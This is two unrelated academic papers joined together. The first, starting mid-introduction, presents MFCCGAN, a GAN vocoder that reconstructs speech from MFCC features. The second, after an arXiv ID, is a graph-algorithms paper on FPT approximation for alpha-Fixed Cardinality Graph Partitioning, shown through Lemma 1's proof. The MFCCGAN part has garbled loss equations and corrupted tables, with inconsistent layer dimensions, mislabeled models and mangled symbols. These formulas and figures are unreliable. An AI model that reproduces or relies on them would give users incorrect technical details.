Generative Adversarial Networks (GANs) have global latent conditioning and efficient parallel sampling [20]. MelGAN is a non-autoregressive feedforward convolutional architecture to perform audio waveform generation in a GAN setup [2]. It was almost the first work on reconstructing raw audio out of Mel-spectrograms. Due to being non-autoregressive, it is fast and suitable to be replaced as an alternative to instead of autoregressive models [2]. This paper presents a GAN-based architecture to generate raw waveform based on MFCC features (MFCCGAN). MFCC could be considered a good feature capacity to utilize in coding systems. Besides coding, CycleGAN-VC1/VC2 [21, 22], use MFCC as conversion features for voice conversion based on WORLD vocoder [23] Therefore, better methods for MFCC inversion with higher quality and intelligibility could be also useful for improving the quality of this family of voice conversion systems. In the following sections, we take a brief review of MFCC features in section 2, then introduce our proposed GAN-based network in section 3. We investigate the perceptual optimization in section 4 and experimental results in section 5, coding applications in section 6, and finally suggest some future research directions besides the conclusion in section 7. 1 Footnote 1: _Source code is available at [https://github.com/MohammadReza2020/infccgan_](https://github.com/MohammadReza2020/infccgan_) ## 2 Mel-Frequency Cepstral Coefficients Mel-Frequency Cepstral Coefficients (MFCC) [24, 25] are among the state-of-the-art features in many speech processing systems. MFCCs are commonly used in speech recognition systems, which aim to detect the linguistic content of the speaker. MFCC is also used in music information retrieval applications such as genre classification [27], audio similarity measurements, etc. Discrete Cosine Transform (DCT) is the key element in MFCC to transform input utterance into output acoustic sequence. Since the MFCC algorithm applies nonlinear operators such as DCT, Logarithmic, and Mel scaling to extract coefficients, it discards lots of information by a low-rank linear projection of the Mel-spectrum and therefore, reconstructing the signal back from its MFCC features is challenging. On the other hand, MFCCs are engineered for other tasks of speech such as automatic speech recognition (ASR) [28] and speaker verification (ASV) [29]. Some attempts have been done so far for MFCC-inversion e.g.[30], Results of these researches are noteworthy, but they have followed complicated structures and used many modules which increase complexity and impose high computation costs, e.g.,[30]. As an example, an MFCC representation with n_mel=128 and n mfcc=40 is analogous to a jpeg image with a quality set to 30% [31]. Simple reconstructions often lead to hissing sounds. Therefore, we propose to learn the conversion process through the deep neural network with a simple model, without any extra module to generate a more natural time-domain raw waveform. We have used an adversarial-based setup introduced in [2] and conditioned on MFCC features as input and called it MFCCGAN. Since adversarial models represent an implicit distribution density, such models are less exposed to over-smoothing which is a common challenge in speech tasks such as coding, synthesis, and conversation. In the following, we investigate each part of the architecture. ## 3 Network Architecture ### Generator The generator of the MFCCGAN speech synthesizer is a fully convolutional network. A stack of transposed convolutional layers has been used to upsample the input MFCC from 256x lower temporal resolution to a raw waveform. Following each convolutional layer, a block of residual layers with a dilation attribute is put on. Dilation leads to a greater receptive field of input, which could better model the variations. The upsampling applies in four stages: two 8x and two 2x resolution increases. 1D transposed convolution operator is applied in each stage to increase the resolution. Residual stacks do not change the input size. Each residual stack consists of three convolutional layers with different dilation parameters. As it is mentioned earlier, these stacks look at the input with a greater field with the aid of dilation properties. Table 1 shows the specifications of each layer of the generator in sequence. ### Discriminator Adopting a multi-scale architecture containing three identical discriminators, which operate on different audio scales (sampling rates), is an important feature of discriminators. Downsampling a signal into lower resolution lets us look into the signal with different frequency resolutions. Higher-frequency behavior cues more at higher scales while a lower sampling rate could reflect the low-frequency behavior. Therefore, scaling the output signal into three levels could lead to better judging of the quality. The downsampling process inside each discriminator is just done using convolutional layers. No pooling is adopted in discriminators except in the input sequence. The structure of all three discriminators is identical, so, only the attribute details of discriminator I, are provided in table 2. The attributes of each convolution layer of discriminators like kernel, stride, padding, and dilation are adjusted so that the downsampled output signal of each discriminator is according to table 3. ### Training objective Inspiring by [2], we have used the Least Squares GAN [32] based on equations (1) to (4) as objective functions:: \[L_{x}=\min_{x}\left(E,\left[1-D,\left(x\right)\right]^{+}+E,\left[0-D_{x} \left(G\left(x\right)\right)\right]\right) \tag{1}\] \[\forall k=1,2,3 \tag{2}\] \[L_{xH}(G,D_{k})=E_{x,k-p_{\text{data}}}\left[\sum_{x=1}^{T}\frac{1}{N_{k}} \left\|D_{k}^{(k)}(x)-D_{k}^{(k)}(G\left(x\right))\right\|_{1}\right] \tag{3}\] \[L_{x}=\min_{x}\left(E,\left[\sum_{x=1,2,3\atop\forall k=1,2,3}\right]+A\sum_{x =1,2,3}L_{x}(G,D,)\right) \tag{4}\] Equation (1) pushes three discriminators to discriminate strictly between real and fake reconstructed data. On the other hand, (2) drives a generator to generate raw waveform similar to the real data, to cheat the discriminator. Since GAN networks are prone to collapse modes, we also utilize an extra loss function LFM as (3) named feature match [2] to trace the status of training. Each discriminator outputs feature maps at its consecutive layers with different time resolutions; therefore, these extra features are used to form the feature match loss between original and predicted samples. The final objective of the generator is then termed (4). ## 4 Perceptual Optimization Using Stoi To increase the quality of synthesized speech more, inspired by MetricGAN [33], we tried to force the discriminators to learn to judge between real and fake data based on a perceptual intelligibility metric, STOI [34]. Therefore, we calculated STOI between real and fake training utterances in each batch and substituted it instead of zero in (1). So, we finally used (5) as a novel perceptual loss function instead of (1) in discriminators to increase the intelligibility of generated utterances of the generator whereas experimental results verified this idea : \[\small\begin{array}{l}L_{p}=\min\limits_{\lambda_{1}}\left(E_{c}\left[1-D_{c}(x )\right]^{\text{T}}+E_{c}\left[STOI(x,G(s))-D_{c}(G(s))\right]^{\text{T}}\right) \\ \forall k=1,2,3\end{array} \tag{5}\] ## 5 Experimental Results To evaluate the proposed idea, we carried out two categories of assessments: objective and subjective tests. For the objective test, we selected the short-time objective intelligibility (STOI) measure which is a popular metric for the assessment of speech intelligibility [33]. There are different aspects of speech quality and among them, intelligibility and naturalness are the most important quality aspects. STOI metric has a higher correlation to subjective listening tests than simple L1 or L2, SNR, segmental SNR, and many other measures [33]. Therefore, this metric can be a good choice for the performance assessment of our proposed system, because the reconstructed and reference speech signals are time-aligned. We have also used a new no-reference naturalness objective assessment representing subjective scores called NISQA [35]. NISQA tool is a five-scaled (0-5) neural-based and non-intrusive objective quality measure for assessing naturalness. This version of NISQA (NISQA-TTS) is trained end-to-end and the time-dependency modeling and time-pooling are achieved through a Self-Attention mechanism customized for TTS applications. Besides the referenced and no-referenced objective tests, we did a simplified crowdsourced subjective test using WebMUSHRA [36]. In this experiment, we used the LJSpeech dataset [37] to prepare the sample speech utterances for training, validation, and test set. We have used 13000 utterances of the LJSpeech dataset to train the model and 100 samples (non-overlapping) utterances to evaluate our proposed method for MFCC-inversion. We used STOI and NISQA measures for assessing and comparing the intelligibility of our proposed system outputs with results of a rule-based MFCC-inversion tool, WORLD, as a strong reference system that is a high-quality vocoder and widely regarded as a state-of-the-art model in SPSS [38]. To consider the dimensionality of MFCC features, we have investigated different MFCC numbers. Table 4 shows the final results in terms of the STOI measure which is defined in a one-third octave band domain. As it is illustrated, the STOI score that is averaged on 100 utterances reconstructed by our proposed system is significantly higher than that of the conventional and rule-based MFCC-inversion WORLD (about 10% higher). For these experiments, we used 36 coefficients of MFCCs for inversion in GAN-based architecture and also for traditional WORLD MFCC-inversion. Although WORLD needs further data such as fundamental frequency and also voiced/unvoiced decision procedure, our proposed method gains higher quality in terms of objective tests. We measured and noted the STOI of synthesized speech in table 4 with MelGAN by 80 Mel-spectrogram coefficients as a reference. According to this table, at least a 4% increase in the NISQA score could be \begin{table} \begin{tabular}{|c|c|c|} \hline \multicolumn{2}{|c|}{Synthesis Tools \& Number of Features} \\ \hline **WORLD Swuthesizer** & **MFCCGAN** & \begin{tabular}{c} **MetaGAN** \\ Multispectrogram \\ \end{tabular} \\ **MFCC36** & \begin{tabular}{c} **MFCC36** \\ \end{tabular} \\ 0.6911 & 0.7664 & 0.9413 \\ 2.9501 & 3.0777 & 3.1934 \\ \hline \end{tabular} \end{table} Table 4: STOI/NISQA measures for reconstructed signals by the proposed model in comparison with WORLD and MelGAN Speech Synthesizers \begin{table} \begin{tabular}{|c|c|c|c|c|c|c|c|c|c|} \hline No. & Layer & Input-size & In-channel & Out-channel & Kernel & Stride & Padding & Dilation & Output-size \\ \hline 0 & input & N\(\times\)1\(\times\)1892 & 1 & 1 & - & - & - & - & N\(\times\)1\(\times\)206 \\ \hline 1 & Conv1d & N\(\times\)1\(\times\)8206 & 1 & 16 & 15 & 1 & 0 & 1 & N\(\times\)16\(\times\)8192 \\ \hline 2 & Conv1d (downsample4x) & N\(\times\)166192 & 16 & 64 & 41 & 4 & 20 & 1 & N\(\times\)256\(\times\)2048 \\ \hline 3 & Conv1d (downsample4x) & N\(\times\)64\(\times\)2048 & 64 & 256 & 41 & 4 & 20 & 1 & N\(\times\)256\(\times\)512 \\ \hline 4 & Conv1d (downsample4x) & N\(\times\)2566\(\times\)512 & 256 & 1024 & 41 & 4 & 4 & 1 & N\(\times\)1024\(\times\)128 \\ \hline 5 & Conv1d (downsample4x) & N\(\times\)1024\(\times\)128 & 1024 & 1024 & 41 & 4 & 20 & 1 & N\(\times\)1024\(\times\)32 \\ \hline 6 & Conv1d & N\(\times\)1024\(\times\)32 & 1024 & 1024 & 5 & 1 & 2 & 1 & N\(\times\)1024\(\times\)32 \\ \hline 7 & Conv1d & N\(\times\)1024\(\times\)32 & 1024 & 1 & 3 & 1 & 1 & 1 & N\(\times\)1\(\times\)32 \\ \hline \end{tabular} \end{table} Table 2: Specifications of each layer of Discriminator in sequence \begin{table} \begin{tabular}{|c|c|c|c|c|c|c|c|c|c|} \hline No. & Layer & Input-size & In-channel & Out-channel & Kernel & Stride & Padding & Dilation & Output-size \\ \hline 1 & Conv1d & N\(\times\)39\(\times\)2* & 80 & 512 & 7 & 1 & 0 & 1 & N\(\times\)12\(\times\)32 \\ \hline 2 & Conv1d transpose(8x) & N\(\times\)512-32 & 512 & 256 & 16 & 8 & 4 & 1 & N\(\times\)256\(\times\)256 \\ \hline 3 & Residual stack & N\(\times\)2568256 & **256** & **256** & 1.3** & 1 & **0** & 0-3.9** & N\(\times\)2568256 \\ \hline 4 & Conv1d transpose(8x) & N\(\times\)256-256 & 256 & 128 & 16 & 8 & 4 & 1 & N\(\times\)128\(\times\)2048 \\ \hline 5 & Residual stack & N\(\times\)1282048 & 128 & 128 & 13 & 1 & 0 & 0-3.9 & N\(\times\)1828\(\times\)2048 \\ \hline 6 & Conv1d transpose(2x) & N\(\times\)128-2048 & 128 & 64 & 4 & 2 & 1 & 1 & N\(\times\)1024\(\times\)496 \\ \hline 7 & Residual stack & N\(\times\)64\(\times\)4096 & 64 & 64 & 1-3 & 1 & 0 & 0-3.9 & N\(\times\)64\(\times\)4096 \\ \hline 8 & Conv1d transpose(2x) & N\(\times\)64\(\times\)4096 & 64 & 32 & 4 & 2 & 1 & 1 & N\(\times\)32\(\times\)8192 \\ \hline 9 & Residual stack & N\(\times\)32\(\times\)8192 & 32 & 32 & 1-3 & 1 & 0 & 0-3.9 & N\(\times\)32\(\times\)8192 \\ \hline 10 & Conv1d & N\(\times\)32\(\times\)8192 & 32 & 1 & 7 & 1 & 0 & 1 & N\(\times\)1\(\times\)8192 \\ \hline \multicolumn{2}{|c|}{* N indicates the batch size.} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} & \multicolumn{1}{c}{} \\ \end{tabular} \end{table} Table 1: Specifications of each layer of Generator in sequence inferred. To better specify the performance of our proposed system, we compare our proposed system with its rival, Librosa as a well-known MFCC-inversion tool. Meanwhile, we used Librosa for MFCC feature extraction to prepare input for training and evaluating our proposed model, we planned another experiment for comparison between our proposed model and Librosa as a rule-based conventional MFCC feature extractor and MFCC-inversion tool. We extracted MFCC coefficients for 100 original speech utterances selected from the LJSpecech database. After that, we reconstructed 100 speech files from an MFCC sequence of 100 original files by Griffin-Lim (Librosa) as a synthesis tool. We measured the intelligibility of these 100 reconstructed files by STOI metric in comparison with their 100 paired original utterances (files). Table 5 shows these results. We repeated this experiment in five different numbers of MFCC features 13, 24, 36, 39, and 80 for each of the 100 files. As can be observed in this table, our proposed system outperforms the Librosa MFCC-inversion obviously in terms of intelligibility by 26% up to 53% increase in STOI and naturalness by 16% up to 78% increase in NISQA score. To compare our proposed system with Librosa, and WORLD subjectively; we carried out a subjective webMUSHRA experimental test. We performed assessments, following the ITU recommendations [39]. As it is illustrated in Fig.1, the proposed approach gives good-quality results. It is worth noting that MFCCGAN quality is close and even higher than WORLD although WORLD gets extra information such as pitch and Voiced/Unvoiced frames while MFCCGAN is only dependent on the MFCC features. Such a system can be used for various areas of speech processing e.g., speech synthesis, speech coding, voice conversion, and other similar speech reproduction applications, wherever the MFCCs have been used as features. To evaluate the effects of (5), we trained again our proposed system MFCCGAN by #36 MFCCs using a novel loss function. In this new configuration, the STOI score increased to 0.7764 (1.3% increase), and the NISQA score to 3.4027 (10% increase of naturalness) in comparison with ordinary MFCCGAN. ## 6 Coding Application Since MFCCGAN extracts certain numbers of features at each frame, this system can be used for high-quality speech coding. Depending on the available bandwidth and the desired quality, according to Table 6, bit-rates ranging from 13 to 80 kbps can be achievable. Our future work will focus on reaching a high quality and low bit rate audio coding based on MFCCGAN. ## 7 Conclusion and Future Works In this paper, we proposed an MFCC-inversion-based speech synthesizer using adversarial learning. The results show that the proposed approach improves the intelligibility measure (STOI) by at least 10% and naturalness by 4% in comparison with a traditional rule-based algorithm WORLD. Also, the proposed system increases by at least 26% intelligibility and 16% naturalness in comparison with Griffin-Lim (Librosa tool). Subjective test results of the proposed system also outperform its conventional counterparts. This work could be used as a synthesizer in many speech tasks such as coding, text-to-speech, and voice conversion applications. Applying a perceptual (STOI) optimization could finally improve the output quality some more. Since the proposed approach achieved a higher webMUSHRA score at low bit rate coding, it hints that such an approach could be improved to be applied to low-bit rate audio coding. In addition to working on quality improvement, our future work will focus on reaching a high quality and low bit rate audio coding based on MFCCGAN. MFCCGAN can also be adopted in speech enhancement tasks. Making MFCCGAN end-to-end is also our future research prospect.
2308.15546
FPT Approximation and Subexponential Algorithms for Covering Few or Many Edges
We study the \textsc{$\alpha$-Fixed Cardinality Graph Partitioning ($\alpha$-FCGP)} problem, the generic local graph partitioning problem introduced by Bonnet et al. [Algorithmica 2015]. In this problem, we are given a graph $G$, two numbers $k,p$ and $0\leq\alpha\leq 1$, the question is whether there is a set $S\subseteq V$ of size $k$ with a specified coverage function $cov_{\alpha}(S)$ at least $p$ (or at most $p$ for the minimization version). The coverage function $cov_{\alpha}(\cdot)$ counts edges with exactly one endpoint in $S$ with weight $\alpha$ and edges with both endpoints in $S$ with weight $1 - \alpha$. $\alpha$-FCGP generalizes a number of fundamental graph problems such as \textsc{Densest $k$-Subgraph}, \textsc{Max $k$-Vertex Cover}, and \textsc{Max $(k,n-k)$-Cut}. A natural question in the study of $\alpha$-FCGP is whether the algorithmic results known for its special cases, like \textsc{Max $k$-Vertex Cover}, could be extended to more general settings. One of the simple but powerful methods for obtaining parameterized approximation [Manurangsi, SOSA 2019] and subexponential algorithms [Fomin et al. IPL 2011] for \textsc{Max $k$-Vertex Cover} is based on the greedy vertex degree orderings. The main insight of our work is that the idea of greed vertex degree ordering could be used to design fixed-parameter approximation schemes (FPT-AS) for $\alpha > 0$ and the subexponential-time algorithms for the problem on apex-minor free graphs for maximization with $\alpha > 1/3$ and minimization with $\alpha < 1/3$.
Fedor V. Fomin, Petr A. Golovach, Tanmay Inamdar, Tomohiro Koana
2023-08-29T18:11:03Z
http://arxiv.org/abs/2308.15546v1
# FPT Approximation and Subexponential Algorithms for Covering Few or Many Edges + ###### Abstract We study the \(\alpha\)-Fixed Cardinality Graph Partitioning (\(\alpha\)-FCGP) problem, the generic local graph partitioning problem introduced by Bonnet et al. [2]. In this problem, we are given a graph \(G\), two numbers \(k,p\) and \(0\leq\alpha\leq 1\), the question is whether there is a set \(S\subseteq V\) of size \(k\) with a specified coverage function \(\mathsf{cov}_{\alpha}(S)\) at least \(p\) (or at most \(p\) for the minimization version). The coverage function \(\mathsf{cov}_{\alpha}(\cdot)\) counts edges with exactly one endpoint in \(S\) with weight \(\alpha\) and edges with both endpoints in \(S\) with weight \(1-\alpha\). \(\alpha\)-FCGP generalizes a number of fundamental graph problems such as Densest \(k\)-Subgraph, Max \(k\)-Vertex Cover, and Max \((k,n-k)\)-Cut. A natural question in the study of \(\alpha\)-FCGP is whether the algorithmic results known for its special cases, like Max \(k\)-Vertex Cover, could be extended to more general settings. One of the simple but powerful methods for obtaining parameterized approximation [20] and subexponential algorithms [17] for Max \(k\)-Vertex Cover is based on the greedy vertex degree orderings. The main insight of our work is that the idea of greedy vertex degree ordering could be used to design fixed-parameter approximation schemes (FPT-AS) for \(\alpha>0\) and the subexponential-time algorithms for the problem on apex-minor free graphs for maximization with \(\alpha>1/3\) and minimization with \(\alpha<1/3\). ## 1 Introduction In this work, we study a broad class of problems called \(\alpha\)-Fixed Cardinality Graph Partitioning (\(\alpha\)-FCGP), originally introduced by Bonnet et al. [2]1. The input is a graph \(G=(V,E)\), two non-negative integers \(k,p\), and a real number \(0\leq\alpha\leq 1\). The question is whether there is a set \(S\subseteq V\) of size exactly \(k\) with \(\mathsf{cov}_{\alpha}(S)\geq p\) (\(\mathsf{cov}_{\alpha}(S)\leq p\) for the minimization variant), where Footnote 1: Bonnet et al. [2] called the problem ‘local graph partitioning problem’, however we adopt the nomenclature from Koana et al. [19]. \[\mathsf{cov}_{\alpha}(S)\coloneqq(1-\alpha)\cdot m(S)+\alpha\cdot m(S,V \setminus S).\] Here, \(m(S)\) is the number of edges with both endpoints in \(S\), and \(m(S,V\setminus S)\) is the number of edges with one endpoint in \(S\) and other in \(V\setminus S\). We will call the maximization and minimization problems Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP, respectively. This problem generalizes many problems, namely, Densest \(k\)-Subgraph (for \(\alpha=0\)), Max \(k\)-Vertex Cover2 (for \(\alpha=1/2\)), Max \((k,n-k)\)-Cut (for \(\alpha=1\)), and their minimization counterparts. Although there are plethora of publications that study these special cases, the general \(\alpha\)-FCGP has not received much attention, except for the work of Bonnet et al. [2], Koana et al. [19], and Schachnai and Zehavi [24]. In this paper, we aim to demonstrate the wider potential of the existing algorithms designed for specific cases, such as Max \(k\)-Vertex Cover, by presenting an algorithm that can handle the more general problem of \(\alpha\)-FCGP. Algorithms for these specific cases often rely on greedy vertex degree orderings. For instance, Manurangsi [20], showing that a \((1-\varepsilon)\)-approximate solution can be found in the set of \(\mathcal{O}(k/\varepsilon)\) vertices with the largest degrees, gave a \((1-\varepsilon)\)-approximation algorithm for Max \(k\)-Vertex Cover that runs in time \((1/\varepsilon)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\). Fomin et al. [14] gave a \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\)-time algorithm for Max \(k\)-Vertex Cover on apex-minor graphs via bidimensionality arguments, by showing that an optimal solution \(S\) is adjacent to every vertex of degree at least \(d+1\), where \(d\) is the minimum degree over vertices in \(S\). In this work, we will give approximation algorithms as well as subexponential-time algorithms for apex-minor free graphs exploiting the greedy vertex ordering. For approximation algorithms, we will show that both Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP admit _FPT Approximation Schemes_ (FPT-AS) for \(\alpha>0\), i.e., there is an algorithm running in time \((\frac{k}{\varepsilon\alpha})^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\) that finds a set \(S\) of size \(k\) with \(\mathsf{cov}_{\alpha}(S)\geq(1-\varepsilon)\cdot\mathsf{OPT}\) (or \(\mathsf{cov}_{\alpha}(S)\leq(1+\varepsilon)\cdot\mathsf{OPT}\) for the minimization variant), where \(\mathsf{OPT}\) denotes the optimal value of \(p\). Previously, the special cases were known to admit FPT approximation schemes; see [22, 16, 17, 20] for \(\alpha=1/2\) and [2] for \(\alpha=1\). In particular, the state-of-the-art running time for Max \(\alpha\)-FCGP with \(\alpha=1/2\) is the aforementioned algorithm of Manurangsi that runs in time \((1/\varepsilon)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\) for maximization (also for the minimization variant). We generalize this argument for \(\alpha\geq 1/3\), leading to a faster FPT-AS for Max \(\alpha\)-FCGP in this range. For \(\alpha=0\), the situation is more negative; Max \(\alpha\)-FCGP (namely, Densest \(k\)-Subgraph) does not admit any \(o(k)\)-approximation algorithm with running time \(f(k)\cdot n^{\mathcal{O}(1)}\) under the Strongish Planted Clique Hypothesis [21]. Min \(\alpha\)-FCGP is also hard to approximate when \(\alpha=0\) since it encompasses Independent Set as a special case for \(p=0\). Next, we discuss the regime of subexponential-time algorithms. Amini et al. [1] showed that Max \(k\)-Vertex Cover is FPT on graphs of bounded degeneracy, including planar graphs, giving a \(k^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\)-time algorithm. They left it open whether it can be solved in time \(2^{o(k)}\cdot n^{O(1)}\). This was answered in the affirmative by Fomin et al. [14], who showed that Max \(k\)-Vertex Cover on apex-minor free graphs can be solved in time \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) time. Generalizing this result, we give a \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\)-time algorithm for Max \(\alpha\)-FCGP with \(\alpha>1/3\) and Min \(\alpha\)-FCGP with \(\alpha<1/3\). The complexity landscape of Max \(\alpha\)-FCGP with \(\alpha<1/3\) (and Min \(\alpha\)-FCGP with \(\alpha>1/3\)) is not well understood. It is a long-standing open question whether Densest \(k\)-Subgraph on planar graphs is NP-hard [4]. Note that the special case Clique is trivially polynyouomial-time solvable on planar graphs because a clique on \(5\) vertices does not admit a planar embedding. Further related work.As mentioned, special cases of \(\alpha\)-FCGP when \(\alpha\in\{0,1/2,1\}\) have been extensively studied. For instance, the W[1]-hardness for the parameter \(k\) has been long known for these special cases [3, 11, 15]. Both Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP are actually W[1]-hard for every \(\alpha\in[0,1]\) with the exception \(\alpha\neq 1/3\), as can be seen from a parameterized reduction from Clique and Independent Set on regular graphs. Note that \(\alpha\)-Fixed Cardinality Graph Partitioning becomes trivial when \(\alpha=1/3\) because \(\mathsf{cov}_{\alpha}(S)=\frac{1}{3}\cdot\sum_{v\in S}d(v)\) for any \(S\subseteq V\) where \(d(v)\) is the degree of \(v\). Bonnet et al. [2] gave a \((\Delta k)^{2k}\cdot n^{\mathcal{O}(1)}\)-time algorithm for \(\alpha\)-FCGP where \(\Delta\) is the maximum degree. They also gave an algorithm with running time \(\Delta^{k}\cdot n^{\mathcal{O}(1)}\) for Max \(\alpha\)-FCGP with \(\alpha>1/3\) and Min \(\alpha\)-FCGP with \(\alpha<1/3\). This result was strengthened by Schachnai and Zehavi [24]; they gave a \(4^{k+o(k)}\Delta^{k}\cdot n^{\mathcal{O}(1)}\)-time algorithm for any value of \(\alpha\). Koana et al. [19] showed that Max \(\alpha\)-FCGP admits polynomial kernels on sparse families of graphs when \(\alpha>1/3\). For instance, Max \(\alpha\)-FCGP admits a \(k^{\mathcal{O}(d)}\)-sized kernel where \(d\) is the degeneracy of the input graph. They also showed analogous results for Min \(\alpha\)-FCGP with \(\alpha<1/3\). Preliminaries.For an integer \(n\), let \([n]\) denote the set \(\{1,\cdots,n\}\). We use the standard graph-theoretic notation and refer to the textbook of Diestel [10] for undefined notions. In this work, we assume that all graphs are simple and undirected. For a graph \(G\) and a vertex set \(S\), let \(G[S]\) be the subgraph of \(G\) induced by \(X\). For a vertex \(v\) in \(G\), let \(d(v)\) be its _degree_, i.e., the number of its neighbors. For vertex sets \(X,Y\), let \(m(X)\coloneqq|\{uv\in E\mid u,v\in X\}|\) and \(m(X,Y)\coloneqq|\{uv\in E\mid u\in X,v\in Y\}|\). In this work, an optimal solution for Max \(\alpha\)-FCGP (and Min \(\alpha\)-FCGP) is a vertex set \(S\) of size \(k\) such that \(\mathsf{cov}_{\alpha}(S)\geq\mathsf{cov}_{\alpha}(S^{\prime})\) (resp., \(\mathsf{cov}_{\alpha}(S)\leq\mathsf{cov}_{\alpha}(S^{\prime})\)) for every vertex set of size \(k\). A graph \(H\) is a _minor_ of \(G\) if a graph isomorphic to \(H\) can be obtained from \(G\) by vertex and edge removals and edge contractions. Given a graph \(H\), a family of graph \(\mathcal{H}\) is said to be _\(H\)-minor free_ if there is no \(G\in\mathcal{H}\) having \(H\) as a minor. A graph \(H\) is an _apex graph_ if \(H\) can be made planar by the removal of a single vertex. We refer to the textbook of Cygan et al. [5] for an introduction to Parameterized Complexity and we refer to the paper of Marx [22] for an introduction to the area of parameterized approximation. ## 2 FPT Approximation Algorithms In this section, we design an FPT Approximation Schemes for Max \(\alpha\)-FCGP as well as Min \(\alpha\)-FCGP parameterized by \(k\) and \(\alpha\), assuming \(\alpha>0\). **Theorem 1**.: _For any \(0<\alpha\leq 1\) and \(0<\varepsilon\leq 1\), Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP each admits an FPT-AS parameterized by \(k\), \(\varepsilon\) and \(\alpha\). More specifically, given a graph \(G=(V,E)\) and an integer \(k\), there exists an algorithm that runs in time \(\left(\frac{k}{\alpha\alpha}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\), and finds a set \(S\subseteq V\) such that \(\mathsf{cov}_{\alpha}(S)\geq(1-\varepsilon)\cdot\mathsf{cov}_{\alpha}(O)\) for Max \(\alpha\)-FCGP and \(\mathsf{cov}_{\alpha}(S)\leq(1+\varepsilon)\cdot\mathsf{cov}_{\alpha}(O)\) for Min \(\alpha\)-FCGP, where \(O\subseteq V\) is an optimal solution._ For the case that \(\mathsf{OPT}\coloneqq\mathsf{cov}_{\alpha}(O)\) is large, the following greedy argument will be helpful. **Lemma 1**.: _For Max \(\alpha\)-FCGP, let \(S\) be the set of \(k\) vertices with the largest degrees. Then, \(\mathsf{cov}_{\alpha}(S)\geq\mathsf{OPT}-2k^{2}\). For Min \(\alpha\)-FCGP, let \(S\) be the set of \(k\) vertices with the smallest degrees. Then, \(\mathsf{cov}_{\alpha}(S)\leq\mathsf{OPT}+2k^{2}\)._ Proof.: Without loss of generality, we assume that \(O\neq S\). Let \(S\setminus O=\{y_{1},y_{2},\ldots,y_{t}\}\), and \(O\setminus S=\{w_{1},w_{2},\ldots,w_{t}\}\), where \(1\leq t\leq k\). Here, we index the vertices so that \(d(y_{i})\geq d(y_{j})\) and \(d(w_{i})\geq d(w_{j})\) (for Min \(\alpha\)-FCGP, \(d(y_{i})\leq d(y_{j})\) and \(d(w_{i})\leq d(w_{j})\)) for \(i<j\). Note that due to the choice of \(S\), it holds that \(d(y_{i})\geq d(w_{i})\) (\(d(y_{i})\leq d(w_{i})\) for Min \(\alpha\)-FCGP) for each \(1\leq i\leq t\). Now we define a sequence of solutions \(O_{0},O_{1},\ldots,O_{t}\), where \(O_{0}=O\), and for each \(1\leq i\leq t\), \(O_{i}\coloneqq(O_{i-1}\setminus\{w_{i}\})\cup\{y_{i}\}\). Note that \(O_{t}=S\). We claim that for each \(1\leq i\leq t\), \(\mathsf{cov}_{\alpha}(O_{i})\geq\mathsf{cov}_{\alpha}(O_{i-1})-2k\) for Max \(\alpha\)-FCGP and \(\mathsf{cov}_{\alpha}(O_{i})\leq\mathsf{cov}_{\alpha}(O_{i-1})+2k\) for Min \(\alpha\)-FCGP. To this end, we note that \(O_{i}\) is obtained from \(O_{i-1}\) by removing \(w_{i}\) and adding \(y_{i}\). Thus, \(\mathsf{cov}_{\alpha}(O_{i})=\mathsf{cov}_{\alpha}(O_{i-1})-(\alpha m_{1}+((1- \alpha)-\alpha)\cdot m_{2})+\alpha m_{3}+((1-\alpha)-\alpha)\cdot m_{4}\), where \[m_{1} \coloneqq m(\left\{w_{i}\right\},V\setminus O_{i-1}), m_{2} \coloneqq m(\left\{w_{i}\right\},O_{i-1}\setminus\{w_{i}\}),\] \[m_{3} \coloneqq m(\left\{y_{i}\right\},V\setminus O_{i}), m_{4} \coloneqq m(\left\{y_{i}\right\},O_{i}\setminus\{w_{i}\}).\] Observe that \(d(w_{i})-k\leq m_{1}\leq d(w_{i})\), \(d(y_{i})-k\leq m_{3}\leq d(y_{i})\), and \(0\leq m_{2},m_{4}\leq k\). We consider Max \(\alpha\)-FCGP first. We have that \[\mathsf{cov}_{\alpha}(O_{i}) =\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})+(1-2\alpha) (m_{4}-m_{2})\] \[\geq\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})-|(1-2\alpha )(m_{4}-m_{2})|.\] Since \(m_{3}-m_{1}\geq d(y_{i})-d(w_{i})-k\geq-k\) and \(|(1-2\alpha)(m_{4}-m_{2})|\leq k\), we obtain \(\mathsf{cov}_{\alpha}(O_{i})\geq\mathsf{cov}_{\alpha}(O_{i-1})-2k\), regardless of the value of \(\alpha\). We consider Min \(\alpha\)-FCGP next. It holds that \[\mathsf{cov}_{\alpha}(O_{i}) =\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})+(1-2\alpha)(m _{4}-m_{2})\] \[\leq\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})+|(1-2\alpha )(m_{4}-m_{2})|.\] Since \(m_{3}-m_{1}\leq d(y_{i})-d(w_{i})+k\leq k\) and \(|(1-2\alpha)(m_{4}-m_{2})|\leq k\), we obtain \(\mathsf{cov}_{\alpha}(O_{i})\leq\mathsf{cov}_{\alpha}(O_{i-1})+2k\), regardless of the value of \(\alpha\). Therefore, \(\mathsf{cov}_{\alpha}(O_{t})\geq\mathsf{cov}_{\alpha}(O_{0})-2kt\geq\mathsf{ OPT}-2k^{2}\) for Max \(\alpha\)-FCGP and \(\mathsf{cov}_{\alpha}(O_{t})\leq\mathsf{cov}_{\alpha}(O_{0})+2kt\leq\mathsf{ OPT}+2k^{2}\) for Min \(\alpha\)-FCGP. 